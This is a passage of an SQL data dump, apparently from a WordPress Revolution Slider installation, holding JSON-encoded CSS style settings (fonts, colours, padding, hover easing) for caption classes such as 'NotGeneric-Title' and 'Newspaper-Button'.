'{\"color\":\"#ffffff\",\"color-transparency\":\"0.65\",\"font-size\":\"16px\",\"line-height\":\"24px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"parallax\":\"-\"}'),
(85, '.tp-caption.FatRounded', '{\"hover\":\"true\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}', '{\"color\":\"#fff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"1\",\"border-color\":\"#d3d3d3\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0px\",\"border-radius\":[\"50px\",\"50px\",\"50px\",\"50px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"Linear.easeNone\"}', '{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}', '{\"color\":\"#fff\",\"color-transparency\":\"1\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"20px\",\"22px\",\"20px\",\"25px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0.5\",\"border-color\":\"#d3d3d3\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0px\",\"border-radius\":[\"50px\",\"50px\",\"50px\",\"50px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),
(86, '.tp-caption.NotGeneric-Title', '{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}', '{\"idle\":\"[object Object]\",\"hover\":\"\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"70px\",\"line-height\":\"70px\",\"font-weight\":\"800\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":\"10px 0px 10px 0\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":\"0 0 0 0\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),
(87, '.tp-caption.NotGeneric-SubTitle', '{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}', '{\"idle\":{\"letter-spacing\":\"4px\",\"text-align\":\"left\"},\"hover\":\"\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"13px\",\"line-height\":\"20px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":\"0 0 0 0\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":\"0 0 0 0\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),
(88, '.tp-caption.NotGeneric-CallToAction', '{\"hover\":\"true\",\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1\",\"border-radius\":\"0px 0px 0px 0px\",\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"Power3.easeOut\"}', '{\"idle\":{\"letter-spacing\":\"3px\",\"text-align\":\"left\"},\"hover\":\"\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"14px\",\"line-height\":\"14px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":\"10px 30px 10px 30px\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.5\",\"border-style\":\"solid\",\"border-width\":\"1\",\"border-radius\":\"0px 0px 0px 0px\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),
(89, '.tp-caption.NotGeneric-Icon', '{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"default\",\"speed\":\"300\",\"easing\":\"Power3.easeOut\"}', '{\"idle\":{\"letter-spacing\":\"3px\",\"text-align\":\"left\"},\"hover\":\"\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":\"0px 0px 0px 0px\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0\",\"border-style\":\"solid\",\"border-width\":\"0px\",\"border-radius\":\"0px 0px 0px 0px\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),
(90, '.tp-caption.NotGeneric-Menuitem', '{\"hover\":\"true\",\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":\"0px 0px 0px 0px\",\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"Power1.easeInOut\"}', '{\"idle\":{\"letter-spacing\":\"3px\",\"text-align\":\"left\"},\"hover\":\"\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"14px\",\"line-height\":\"14px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":\"27px 30px 27px 30px\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.15\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":\"0px 0px 0px 0px\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),
(91, '.tp-caption.MarkerStyle', '{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}', '{\"idle\":{\"text-align\":\"left\",\"0\":\"\"},\"hover\":\"\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"30px\",\"font-weight\":\"100\",\"font-style\":\"normal\",\"font-family\":\"\\\"Permanent Marker\\\"\",\"padding\":\"0 0 0 0\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":\"0 0 0 0\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),
(92, '.tp-caption.Gym-Menuitem', '{\"hover\":\"true\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"1\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.25\",\"border-style\":\"solid\",\"border-width\":\"2px\",\"border-radius\":[\"3px\",\"3px\",\"3px\",\"3px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"200\",\"easing\":\"Linear.easeNone\"}', '{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"3px\",\"5px\",\"3px\",\"8px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"1\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0\",\"border-style\":\"solid\",\"border-width\":\"2px\",\"border-radius\":[\"3px\",\"3px\",\"3px\",\"3px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),
(93, '.tp-caption.Newspaper-Button', '{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}', '{\"color\":\"#000000\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#FFFFFF\",\"background-transparency\":\"1\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"Power1.easeInOut\"}', '{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"13px\",\"line-height\":\"17px\",\"font-weight\":\"700\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"12px\",\"35px\",\"12px\",\"35px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#ffffff\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.25\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),
(94, '.tp-caption.Newspaper-Subtitle', '{\"hover\":\"false\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}', '{\"idle\":\"\",\"hover\":\"\"}', '{\"color\":\"#a8d8ee\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"20px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),
(95, '.tp-caption.Newspaper-Title', '{\"hover\":\"false\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}', '{\"idle\":\"\",\"hover\":\"\"}', '{\"color\":\"#fff\",\"color-transparency\":\"1\",\"font-size\":\"50px\",\"line-height\":\"55px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"\\\"Roboto Slab\\\"\",\"padding\":[\"0\",\"0\",\"10px\",\"0\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),
(96, '.tp-caption.Newspaper-Title-Centered', '{\"hover\":\"false\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}', '{\"idle\":\"\",\"hover\":\"\"}', '{\"color\":\"#fff\",\"color-transparency\":\"1\",\"font-size\":\"50px\",\"line-height\":\"55px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"\\\"Roboto Slab\\\"\",\"padding\":[\"0\",\"0\",\"10px\",\"0\"],\"text-decoration\":\"none\",\"text-align\":\"center\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),
(97, '.tp-caption.Hero-Button', '{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}', '{\"color\":\"#000000\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#ffffff\",\"background-transparency\":\"1\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"Power1.easeInOut\"}', '{\"idle\":{\"letter-spacing\":\"3px\"},\"hover\":\"\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"14px\",\"line-height\":\"14px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"10px\",\"30px\",\"10px\",\"30px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.5\",\"border-style\":\"solid\",\"border-width\":\"1\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),
(98, '.tp-caption.Video-Title', '{\"hover\":\"false\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}', '{\"idle\":\"\",\"hover\":\"\"}', '{\"color\":\"#fff\",\"color-transparency\":\"1\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"5px\",\"5px\",\"5px\",\"5px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"-20%\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),
(99, '.tp-caption.Video-SubTitle', '{\"hover\":\"false\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}', '{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"12px\",\"line-height\":\"12px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"5px\",\"5px\",\"5px\",\"5px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0.35\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"-20%\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),
(100, '.tp-caption.NotGeneric-Button', '{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"Power1.easeInOut\"}', '{\"idle\":{\"letter-spacing\":\"3px\",\"text-align\":\"left\"},\"hover\":\"\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"14px\",\"line-height\":\"14px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"10px\",\"30px\",\"10px\",\"30px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.5\",\"border-style\":\"solid\",\"border-width\":\"1\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),
(101, '.tp-caption.NotGeneric-BigButton', '{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"Power1.easeInOut\"}', '{\"idle\":{\"letter-spacing\":\"3px\"},\"hover\":\"\"}', 